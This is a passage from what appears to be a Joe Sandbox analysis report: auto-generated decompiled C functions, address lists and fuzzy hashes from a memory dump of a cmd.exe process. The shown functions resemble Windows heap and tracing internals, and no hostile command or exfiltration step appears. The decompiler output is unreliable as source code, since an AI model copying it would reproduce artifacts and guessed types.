							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x3bb5c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E03C0F6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E03C0F6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E03C57016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L03BF2400( &_v52);
								}
								_t21 = L03BF2400( &_v28);
							}
						}
					}
				}
				return _t21;
			}



















                                                                                                                                          0x03c56cfb
                                                                                                                                          0x03c56d00
                                                                                                                                          0x03c56d02
                                                                                                                                          0x03c56d06
                                                                                                                                          0x03c56d0a
                                                                                                                                          0x03c56d0e
                                                                                                                                          0x03c56d19
                                                                                                                                          0x03c56d2b
                                                                                                                                          0x03c56d1b
                                                                                                                                          0x03c56d24
                                                                                                                                          0x03c56d24
                                                                                                                                          0x03c56d33
                                                                                                                                          0x03c56d39
                                                                                                                                          0x03c56d46
                                                                                                                                          0x03c56d4f
                                                                                                                                          0x03c56d61
                                                                                                                                          0x03c56d51
                                                                                                                                          0x03c56d5a
                                                                                                                                          0x03c56d5a
                                                                                                                                          0x03c56d69
                                                                                                                                          0x03c56d6b
                                                                                                                                          0x03c56d6d
                                                                                                                                          0x03c56d6f
                                                                                                                                          0x03c56d6f
                                                                                                                                          0x03c56d74
                                                                                                                                          0x03c56d79
                                                                                                                                          0x03c56d7a
                                                                                                                                          0x03c56d7f
                                                                                                                                          0x03c56d82
                                                                                                                                          0x03c56d88
                                                                                                                                          0x03c56d89
                                                                                                                                          0x03c56d90
                                                                                                                                          0x03c56d94
                                                                                                                                          0x03c56da7
                                                                                                                                          0x03c56db1
                                                                                                                                          0x03c56db1
                                                                                                                                          0x03c56dbb
                                                                                                                                          0x03c56dbb
                                                                                                                                          0x03c56d90
                                                                                                                                          0x03c56d69
                                                                                                                                          0x03c56d46
                                                                                                                                          0x03c56dc6

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 1a9bc3afa10c8c516118a0df78f268386f79c89513d9bbf777e0040c889e56e9
                                                                                                                                          • Instruction ID: d05fab0e2035a5925c51a757c9bf536ee067ce5c67ca2c89c5a906c8a166ba56
                                                                                                                                          • Opcode Fuzzy Hash: 1a9bc3afa10c8c516118a0df78f268386f79c89513d9bbf777e0040c889e56e9
                                                                                                                                          • Instruction Fuzzy Hash: 1C21F5725007449FD721DF29C944B6BB7ECAF81644F4819A6FD40DF250DB34C698C6A6
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03CA070D Relevance: .1, Instructions: 72COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 67%
                                                                                                                                          			E03CA070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E03CA07DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E03C9AFDE( &_v8,  &_v12);
					E03CA1293(_t38, _v28, _t60);
					if(E03BF7D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E03C914FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}













                                                                                                                                          0x03ca071b
                                                                                                                                          0x03ca0724
                                                                                                                                          0x03ca0734
                                                                                                                                          0x03ca0738
                                                                                                                                          0x03ca074b
                                                                                                                                          0x03ca074b
                                                                                                                                          0x03ca0753
                                                                                                                                          0x03ca0753
                                                                                                                                          0x03ca0759
                                                                                                                                          0x03ca075d
                                                                                                                                          0x03ca0774
                                                                                                                                          0x03ca0779
                                                                                                                                          0x03ca077d
                                                                                                                                          0x03ca0789
                                                                                                                                          0x03ca0795
                                                                                                                                          0x03ca07a7
                                                                                                                                          0x03ca0797
                                                                                                                                          0x03ca07a0
                                                                                                                                          0x03ca07a0
                                                                                                                                          0x03ca07af
                                                                                                                                          0x03ca07c4
                                                                                                                                          0x03ca07cd
                                                                                                                                          0x03ca07cd
                                                                                                                                          0x03ca07af
                                                                                                                                          0x03ca07dc

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                                                                                                          • Instruction ID: 642d1ba01626441129e1b150f4d23b49fad57e91f3e7b273d2fd5135b8761f0f
                                                                                                                                          • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                                                                                                          • Instruction Fuzzy Hash: F1210E3A204605AFD705DF2CC884A6ABBE5EFC4294F088669F994CF381CA30D909CB91
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03CA2EF7 Relevance: .1, Instructions: 72COMMONCrypto
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 35%
                                                                                                                                          			E03CA2EF7(void* __ecx, signed int __edx, void* _a8, signed int _a12) {
				char _v5;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v32;
				signed int _v44;
				signed int _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int _v60;
				signed int _v64;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t62;
				void* _t71;
				signed int _t94;
				signed int _t105;
				signed int _t106;
				void* _t107;
				signed int _t114;
				signed int _t115;
				signed int _t141;
				signed int _t142;
				signed char _t145;
				signed char _t146;
				void* _t154;
				signed int _t155;
				void* _t156;
				signed int _t160;
				signed int _t164;
				void* _t165;
				signed int _t172;
				signed int _t174;

				_push(__ecx);
				_push(__ecx);
				_t105 = __edx;
				_t154 = __ecx;
				_t160 =  *__edx ^ __edx;
				_t141 =  *(__edx + 4) ^ __edx;
				if(( *(_t160 + 4) ^ _t160) != __edx || ( *_t141 ^ _t141) != __edx) {
					_t114 = 3;
					asm("int 0x29");
					_t174 = (_t172 & 0xfffffff8) - 0x24;
					_t62 =  *0x3ccd360 ^ _t174;
					_v32 = _t62;
					_push(_t105);
					_push(_t160);
					_t106 = _t114;
					_t115 = _v20;
					_push(_t154);
					_t155 = _t141;
					_t142 = _v16;
					__eflags = _t115;
					if(__eflags != 0) {
						asm("bsf esi, ecx");
					} else {
						asm("bsf esi, edx");
						_t62 = (_t62 & 0xffffff00 | __eflags != 0x00000000) & 0x000000ff;
						__eflags = _t62;
						if(_t62 == 0) {
							_t160 = _v44;
						} else {
							_t160 = _t160 + 0x20;
						}
					}
					__eflags = _t142;
					if(__eflags == 0) {
						asm("bsr eax, ecx");
					} else {
						asm("bsr ecx, edx");
						if(__eflags == 0) {
							_t62 = _v44;
						} else {
							_t27 = _t115 + 0x20; // 0x20
							_t62 = _t27;
						}
					}
					_v56 = (_t160 << 0xc) + _t155;
					_v60 = _t62 - _t160 + 1 << 0xc;
					_t71 = E03C1D0F0(1, _t62 - _t160 + 1, 0);
					asm("adc edx, 0xffffffff");
					_v52 = E03C1D0F0(_t71 + 0xffffffff, _t160, 0);
					_v48 = 0;
					_v44 = _t155 + 0x10;
					E03BF2280(_t155 + 0x10, _t155 + 0x10);
					__eflags = _a12;
					_push(_v64);
					_push(_v60);
					_push( *((intOrPtr*)(_t106 + 0x20)));
					if(_a12 == 0) {
						 *0x3ccb1e0();
						 *( *(_t106 + 0x30) ^  *0x3cc6110 ^ _t106)();
						 *(_t155 + 0xc) =  *(_t155 + 0xc) &  !_v60;
						_t54 = _t155 + 8;
						 *_t54 =  *(_t155 + 8) &  !_v64;
						__eflags =  *_t54;
						goto L18;
					} else {
						 *0x3ccb1e0();
						_t164 =  *( *(_t106 + 0x2c) ^  *0x3cc6110 ^ _t106)();
						__eflags = _t164;
						if(_t164 >= 0) {
							 *(_t155 + 8) =  *(_t155 + 8) | _v64;
							 *(_t155 + 0xc) =  *(_t155 + 0xc) | _v60;
							L18:
							asm("lock xadd [eax], ecx");
							_t164 = 0;
							__eflags = 0;
						}
					}
					E03BEFFB0(_t106, _t155, _v56);
					_pop(_t156);
					_pop(_t165);
					_pop(_t107);
					__eflags = _v48 ^ _t174;
					return E03C1B640(_t164, _t107, _v48 ^ _t174, 0, _t156, _t165);
				} else {
					_t94 = _t141 ^ _t160;
					 *_t141 = _t94;
					 *(_t160 + 4) = _t94;
					_t145 =  !( *(__edx + 8));
					_t146 = _t145 >> 8;
					_v12 = _t146 >> 8;
					_v5 =  *((intOrPtr*)((_t145 & 0x000000ff) + 0x3bbac00)) +  *((intOrPtr*)((_t146 & 0x000000ff) + 0x3bbac00));
					asm("lock xadd [eax], edx");
					return __ecx + 0x18;
				}
			}






































                                                                                                                                          0x03ca2efc
                                                                                                                                          0x03ca2efd
                                                                                                                                          0x03ca2eff
                                                                                                                                          0x03ca2f03
                                                                                                                                          0x03ca2f0a
                                                                                                                                          0x03ca2f0c
                                                                                                                                          0x03ca2f15
                                                                                                                                          0x03ca2fba
                                                                                                                                          0x03ca2fbb
                                                                                                                                          0x03ca2fc5
                                                                                                                                          0x03ca2fcd
                                                                                                                                          0x03ca2fcf
                                                                                                                                          0x03ca2fd3
                                                                                                                                          0x03ca2fd4
                                                                                                                                          0x03ca2fd5
                                                                                                                                          0x03ca2fd7
                                                                                                                                          0x03ca2fda
                                                                                                                                          0x03ca2fdb
                                                                                                                                          0x03ca2fdd
                                                                                                                                          0x03ca2fe0
                                                                                                                                          0x03ca2fe2
                                                                                                                                          0x03ca2ffc
                                                                                                                                          0x03ca2fe4
                                                                                                                                          0x03ca2fe4
                                                                                                                                          0x03ca2fea
                                                                                                                                          0x03ca2fed
                                                                                                                                          0x03ca2fef
                                                                                                                                          0x03ca2ff6
                                                                                                                                          0x03ca2ff1
                                                                                                                                          0x03ca2ff1
                                                                                                                                          0x03ca2ff1
                                                                                                                                          0x03ca2fef
                                                                                                                                          0x03ca2fff
                                                                                                                                          0x03ca3001
                                                                                                                                          0x03ca301b
                                                                                                                                          0x03ca3003
                                                                                                                                          0x03ca3003
                                                                                                                                          0x03ca300e
                                                                                                                                          0x03ca3015
                                                                                                                                          0x03ca3010
                                                                                                                                          0x03ca3010
                                                                                                                                          0x03ca3010
                                                                                                                                          0x03ca3010
                                                                                                                                          0x03ca300e
                                                                                                                                          0x03ca302c
                                                                                                                                          0x03ca3035
                                                                                                                                          0x03ca303c
                                                                                                                                          0x03ca3046
                                                                                                                                          0x03ca304e
                                                                                                                                          0x03ca3056
                                                                                                                                          0x03ca305a
                                                                                                                                          0x03ca305e
                                                                                                                                          0x03ca3063
                                                                                                                                          0x03ca3067
                                                                                                                                          0x03ca306b
                                                                                                                                          0x03ca306f
                                                                                                                                          0x03ca3072
                                                                                                                                          0x03ca30af
                                                                                                                                          0x03ca30b5
                                                                                                                                          0x03ca30c1
                                                                                                                                          0x03ca30c9
                                                                                                                                          0x03ca30c9
                                                                                                                                          0x03ca30c9
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca3074
                                                                                                                                          0x03ca3081
                                                                                                                                          0x03ca3089
                                                                                                                                          0x03ca308b
                                                                                                                                          0x03ca308d
                                                                                                                                          0x03ca3093
                                                                                                                                          0x03ca309a
                                                                                                                                          0x03ca30ce
                                                                                                                                          0x03ca30d1
                                                                                                                                          0x03ca30d5
                                                                                                                                          0x03ca30d5
                                                                                                                                          0x03ca30d5
                                                                                                                                          0x03ca308d
                                                                                                                                          0x03ca30db
                                                                                                                                          0x03ca30e6
                                                                                                                                          0x03ca30e7
                                                                                                                                          0x03ca30e8
                                                                                                                                          0x03ca30e9
                                                                                                                                          0x03ca30f3
                                                                                                                                          0x03ca2f27
                                                                                                                                          0x03ca2f29
                                                                                                                                          0x03ca2f2b
                                                                                                                                          0x03ca2f2d
                                                                                                                                          0x03ca2f36
                                                                                                                                          0x03ca2f3d
                                                                                                                                          0x03ca2f4c
                                                                                                                                          0x03ca2f58
                                                                                                                                          0x03ca2fad
                                                                                                                                          0x03ca2fb7
                                                                                                                                          0x03ca2fb7

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 9bc70aa64adafd01114de150b03ce01dff40adf26c54d64aad2d0e0ee9f240e7
                                                                                                                                          • Instruction ID: 13a5c1e0643f5b34a1edf845ac3b340d39e44f8bc9c50c5f0ef764d11a1d9940
                                                                                                                                          • Opcode Fuzzy Hash: 9bc70aa64adafd01114de150b03ce01dff40adf26c54d64aad2d0e0ee9f240e7
                                                                                                                                          • Instruction Fuzzy Hash: 5921E7716041601FD794CB1ECCB05B6BFE6EFC612634B82E5E888DF342C9649807C7A0
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03CA1FF1 Relevance: .1, Instructions: 70COMMONCrypto
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 77%
                                                                                                                                          			E03CA1FF1(void* __ecx, intOrPtr __edx, signed int _a4) {
				intOrPtr _v8;
				signed int _t22;
				signed int _t34;
				signed int _t38;
				signed int _t41;
				signed int _t42;
				signed int _t44;
				signed int _t54;
				signed int _t55;

				_t44 = _a4;
				_v8 = __edx;
				_t3 = _t44 + 0x1007; // 0x1007
				_t41 = _t3 & 0xfffff000;
				_t54 = ( *_t44 ^  *0x3cc6110 ^ _t44) >> 0x00000001 & 0x00007fff;
				if(_t41 - _t44 < _t54 << 3) {
					_t42 = _t41 + 0xfffffff0;
					_t34 = _t42 - _t44 >> 3;
					_t55 = _t54 - _t34;
					 *_t44 =  *_t44 ^ (_t34 + _t34 ^  *_t44 ^  *0x3cc6110 ^ _t44) & 0x0000fffe;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_t22 = ((_t34 & 0x00007fff) << 0x0000000f | _t55 & 0x00007fff) + ((_t34 & 0x00007fff) << 0x0000000f | _t55 & 0x00007fff);
					 *_t42 = _t22;
					_t38 = _t42 + _t55 * 8;
					 *_t42 = _t22 ^  *0x3cc6110 ^ _t42;
					if(_t38 < _v8 + (( *(_v8 + 0x14) & 0x0000ffff) + 3) * 8) {
						 *_t38 =  *_t38 ^ (_t55 << 0x00000010 ^  *0x3cc6110 ^ _t38 ^  *_t38) & 0x7fff0000;
					}
				} else {
					_t42 = 0;
				}
				return _t42;
			}












                                                                                                                                          0x03ca1ff9
                                                                                                                                          0x03ca1ffc
                                                                                                                                          0x03ca2001
                                                                                                                                          0x03ca200d
                                                                                                                                          0x03ca201b
                                                                                                                                          0x03ca2028
                                                                                                                                          0x03ca202e
                                                                                                                                          0x03ca2035
                                                                                                                                          0x03ca2038
                                                                                                                                          0x03ca204c
                                                                                                                                          0x03ca2052
                                                                                                                                          0x03ca2053
                                                                                                                                          0x03ca2054
                                                                                                                                          0x03ca2055
                                                                                                                                          0x03ca2069
                                                                                                                                          0x03ca206c
                                                                                                                                          0x03ca206e
                                                                                                                                          0x03ca2079
                                                                                                                                          0x03ca2087
                                                                                                                                          0x03ca209c
                                                                                                                                          0x03ca209c
                                                                                                                                          0x03ca202a
                                                                                                                                          0x03ca202a
                                                                                                                                          0x03ca202a
                                                                                                                                          0x03ca20a5

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: cc0f64e86d878ab2cef6e2d40c550f343b4f5ba98947a9ca313c78aaf8b89006
                                                                                                                                          • Instruction ID: 16bac5d364b15d68fdfae5ef38f16c17867ccfb0ac6fd04aec59d3bc0f632874
                                                                                                                                          • Opcode Fuzzy Hash: cc0f64e86d878ab2cef6e2d40c550f343b4f5ba98947a9ca313c78aaf8b89006
                                                                                                                                          • Instruction Fuzzy Hash: 9021D233A208229F8B18CF7CC801566F7E6EF8C21532A467AD812DB264EA70BD11D680
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C57794 Relevance: .1, Instructions: 70COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 82%
                                                                                                                                          			E03C57794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x3cc7b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L03BF4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E03C1F3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E03BF7D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E03C19AE0();
					_t24 = L03BF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}













                                                                                                                                          0x03c57799
                                                                                                                                          0x03c5779a
                                                                                                                                          0x03c5779b
                                                                                                                                          0x03c577a3
                                                                                                                                          0x03c577ab
                                                                                                                                          0x03c577ae
                                                                                                                                          0x03c577b1
                                                                                                                                          0x03c577b1
                                                                                                                                          0x03c577bf
                                                                                                                                          0x03c577c4
                                                                                                                                          0x03c577c8
                                                                                                                                          0x03c577ce
                                                                                                                                          0x03c577d4
                                                                                                                                          0x03c577e0
                                                                                                                                          0x03c577e0
                                                                                                                                          0x03c577d6
                                                                                                                                          0x03c577d6
                                                                                                                                          0x03c577de
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c577de
                                                                                                                                          0x03c577e5
                                                                                                                                          0x03c577f0
                                                                                                                                          0x03c577f3
                                                                                                                                          0x03c577f6
                                                                                                                                          0x03c577fd
                                                                                                                                          0x03c57800
                                                                                                                                          0x03c5780c
                                                                                                                                          0x03c57818
                                                                                                                                          0x03c5782b
                                                                                                                                          0x03c5781a
                                                                                                                                          0x03c57823
                                                                                                                                          0x03c57823
                                                                                                                                          0x03c57830
                                                                                                                                          0x03c57831
                                                                                                                                          0x03c57838
                                                                                                                                          0x03c5783d
                                                                                                                                          0x03c5783e
                                                                                                                                          0x03c5784f
                                                                                                                                          0x03c5784f
                                                                                                                                          0x03c5785a

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 986d3d51fcf99442c7ab3e223ad9a68e77ba59741596e2d02a1773c75d56f2f1
                                                                                                                                          • Instruction ID: 64dfd16c961c42c50b2adbb654f1c6685e6bc4b809ff899067590c83f40b073c
                                                                                                                                          • Opcode Fuzzy Hash: 986d3d51fcf99442c7ab3e223ad9a68e77ba59741596e2d02a1773c75d56f2f1
                                                                                                                                          • Instruction Fuzzy Hash: 9C21C376500604AFC725DF69DC90E6BB7B8EF48340F1405ADFA0ADB750DA34EA40CB98
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03BFAE73 Relevance: .1, Instructions: 70COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 96%
                                                                                                                                          			E03BFAE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E03BF7D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E03BF7D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E03BF7D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E03BF7D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E03C57794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}













                                                                                                                                          0x03bfae78
                                                                                                                                          0x03bfae7c
                                                                                                                                          0x03bfae7e
                                                                                                                                          0x03bfae81
                                                                                                                                          0x03bfae86
                                                                                                                                          0x03bfae8d
                                                                                                                                          0x03c42691
                                                                                                                                          0x03bfae93
                                                                                                                                          0x03bfae93
                                                                                                                                          0x03bfae93
                                                                                                                                          0x03bfae98
                                                                                                                                          0x03bfae9d
                                                                                                                                          0x03c426a2
                                                                                                                                          0x03c426b4
                                                                                                                                          0x03c426a4
                                                                                                                                          0x03c426ad
                                                                                                                                          0x03c426ad
                                                                                                                                          0x03c426b9
                                                                                                                                          0x00000000
                                                                                                                                          0x03c426bb
                                                                                                                                          0x00000000
                                                                                                                                          0x03c426bb
                                                                                                                                          0x03bfaea3
                                                                                                                                          0x03bfaea3
                                                                                                                                          0x03bfaea3
                                                                                                                                          0x03bfaeaa
                                                                                                                                          0x03c426c0
                                                                                                                                          0x03c426c9
                                                                                                                                          0x03c426c9
                                                                                                                                          0x03bfaeb3
                                                                                                                                          0x03c426d4
                                                                                                                                          0x03c426e1
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c426e7
                                                                                                                                          0x03c426ee
                                                                                                                                          0x03c426f0
                                                                                                                                          0x03c426f9
                                                                                                                                          0x03c426f9
                                                                                                                                          0x03c42702
                                                                                                                                          0x03c42708
                                                                                                                                          0x03c42708
                                                                                                                                          0x03c4270b
                                                                                                                                          0x03c4270f
                                                                                                                                          0x03c42711
                                                                                                                                          0x03c42711
                                                                                                                                          0x03c42725
                                                                                                                                          0x03c42725
                                                                                                                                          0x00000000
                                                                                                                                          0x03bfaeb9
                                                                                                                                          0x03bfaeb9
                                                                                                                                          0x03bfaebf
                                                                                                                                          0x03bfaebf
                                                                                                                                          0x03bfaeb3

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                                                                                                          • Instruction ID: 973aa1bd4cdb7de04b739adc7874ae44c15dfbf5f31138fa5400e4a7b4fbef9c
                                                                                                                                          • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                                                                                                          • Instruction Fuzzy Hash: 6421C275A016849FD726DB29C945B6577E8EF44288F1D14F0EE08CF692DB34DD40CA90
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C0FD9B Relevance: .1, Instructions: 69COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 93%
                                                                                                                                          			E03C0FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L03BF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E03BE76E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L03BF4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}










                                                                                                                                          0x03c0fd9b
                                                                                                                                          0x03c0fda0
                                                                                                                                          0x03c0fda1
                                                                                                                                          0x03c0fdab
                                                                                                                                          0x03c0fdad
                                                                                                                                          0x03c0fdb0
                                                                                                                                          0x03c0fdb8
                                                                                                                                          0x03c0fe0f
                                                                                                                                          0x03c0fde6
                                                                                                                                          0x03c0fde9
                                                                                                                                          0x03c0fdec
                                                                                                                                          0x03c4c0c0
                                                                                                                                          0x03c0fdfe
